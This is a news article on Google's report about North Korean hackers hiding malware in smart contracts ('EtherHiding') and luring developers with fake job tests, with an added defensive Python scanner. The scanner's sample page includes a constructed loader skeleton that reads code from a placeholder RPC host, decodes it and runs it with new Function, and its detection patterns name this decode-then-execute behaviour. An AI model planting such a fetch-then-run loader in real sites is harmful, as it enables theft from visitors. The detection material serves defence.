North Korean hackers embed sophisticated malicious code in smart contracts, Google reports

North Korean hackers have adopted a method of deploying malware designed to steal crypto and sensitive information by embedding malicious code into smart contracts on public blockchain networks, according to Google’s Threat Intelligence Group.
The technique, called “EtherHiding,” first appeared in 2023 and is commonly used together with social engineering techniques such as approaching victims with fake job offers and high-profile interviews, then directing them to malicious websites or links, according to Google.
Hackers compromise a legitimate website and embed a JavaScript loader script into it. The loader retrieves a separate malicious code package stored in a smart contract, which is designed to steal funds and data as soon as the user interacts with the compromised site.
The compromised website communicates with the blockchain network through a “read-only” function that does not create a transaction on the ledger, which lets the threat actors avoid detection and reduce transaction fees, Google researchers said.
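Because the payload is retrieved with a read-only call, nothing is written to the ledger, so on-chain transaction monitoring will not see the retrieval; what a defender can observe is the compromised page's own scripts and the JSON-RPC requests they make. The scanner below is an added example written for this article, not code from Google's report or from any referenced project. It scores a page's inline scripts on indicators assumed from the description above: a read-only RPC call, a public node endpoint, hex-to-text decoding, and dynamic code execution. The indicator names, weights, threshold and the three sample scripts are all constructed.

```python
"""Heuristic scanner for EtherHiding-style loaders in a web page's scripts.

Added example; indicator names, weights, threshold and samples are assumptions
derived from the technique described in the article, not from Google's report.
"""
import re
from dataclasses import dataclass

# (indicator name, pattern, weight). A read-only call and an RPC endpoint are
# routine in legitimate dapps, so they weigh less than decode-then-execute.
INDICATORS = [
    ("rpc_read_call",
     re.compile(r'["\']eth_call["\']|\.call\s*\(\s*\{'), 1),
    ("public_rpc_endpoint",
     re.compile(r'https?://[\w.-]*(bsc|binance|infura|alchemy|ankr|rpc)[\w./-]*', re.I), 1),
    ("hex_to_text",
     re.compile(r'hexToAscii|hexToUtf8|toUtf8String|fromCharCode\s*\(\s*parseInt', re.I), 2),
    ("dynamic_exec",
     re.compile(r'\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|createElement\s*\(\s*["\']script["\']', re.I), 2),
]
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


@dataclass
class Finding:
    script_id: str
    hits: list
    score: int
    suspicious: bool


def scan_script(script_id: str, source: str) -> Finding:
    """Score one script. It is flagged only when the chain-read and the
    dynamic-execution indicators co-occur, i.e. the fetch-then-run pattern."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(source)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    suspicious = "rpc_read_call" in hits and "dynamic_exec" in hits and score >= 4
    return Finding(script_id, hits, score, suspicious)


def extract_scripts(html: str) -> list:
    """Return the bodies of inline <script> blocks in document order."""
    return [m.group(1) for m in SCRIPT_RE.finditer(html)]


def scan_html(html: str) -> list:
    """Scan every inline script of a page and return one Finding per script."""
    return [scan_script(f"script-{i}", body)
            for i, body in enumerate(extract_scripts(html))]


# Constructed sample page: a benign balance widget, a fetch-then-run loader
# skeleton using placeholder names only, and an unrelated script that only
# uses eval. None of these is real code from a compromised site.
SAMPLE_HTML = r"""
<html><body>
<script>
  const web3 = new Web3("https://rpc.example-node.invalid");
  const bal = await contract.methods.balanceOf(addr).call({from: addr});
  document.getElementById("bal").innerText = web3.utils.fromWei(bal);
</script>
<script>
  const r = await fetch("https://rpc.example-node.invalid", {method: "POST",
    body: JSON.stringify({jsonrpc: "2.0", id: 1, method: "eth_call",
      params: [{to: PLACEHOLDER_CONTRACT, data: PLACEHOLDER_SELECTOR}, "latest"]})});
  const js = web3.utils.hexToUtf8((await r.json()).result);
  new Function(js)();
</script>
<script>
  eval(localStorage.getItem("cfg"));
</script>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"{f.script_id}: score={f.score} hits={f.hits} suspicious={f.suspicious}")
```

Only the middle script is flagged: the benign widget makes a read-only call but never executes what it reads back, and the third script executes dynamic code but never touches a chain. A flagged script is a triage lead, not a verdict; the follow-up is to fetch the contract's return data with the same read-only call and inspect what the page would have executed. A Content Security Policy that forbids inline scripts and `eval` blocks this fetch-then-run pattern regardless of where the payload is hosted.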
The report highlighted the need for vigilance in the crypto community to keep users safe from scams and hacks, threats that are routinely employed by threat actors attempting to steal funds and valuable information from individuals and organizations alike.
Know the signs: North Korea's social engineering campaign decoded
Threat actors set up fake companies and recruitment and profiling agencies to target software and cryptocurrency developers with fake job offers, according to Google.
After the initial pitch, the attackers move the communication to messaging platforms like Discord or Telegram and direct the victim to take an employment test or complete a coding task.
“The main attack occurs during a technical assessment phase,” says Google Threat Intelligence. At this stage, the victim is usually told to download malicious files from online code repositories such as GitHub, where the malicious payload is stored.
At other times, the attackers lure the victim into a video call where a fake error message is shown to the user, prompting them to download a patch to fix the error. This software patch also contains malicious code.
Once the malicious software is installed on a machine, a JavaScript-based second stage called “Jadesnow” is deployed to steal sensitive data.
A third stage is sometimes deployed for high-value targets, allowing attackers long-term access to a compromised machine and other systems connected to its network, Google warned.